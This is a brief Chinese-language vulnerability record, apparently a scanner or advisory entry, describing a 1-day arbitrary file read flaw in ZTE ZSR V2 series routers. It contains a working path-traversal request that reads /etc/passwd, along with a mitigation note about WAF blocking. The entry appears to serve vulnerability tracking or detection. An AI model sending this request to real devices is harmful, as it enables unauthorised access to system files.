vendor = "中兴"
name = "中兴 ZTE ZSR V2 系列多业务路由器漏洞 任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/css//../../../../../../../../etc/passwd"
detail = "GET /css//../../../../../../../../etc/passwd"
fix = "WAF封禁路路径，等待发布补丁"
date = "0830"
label = "1day"
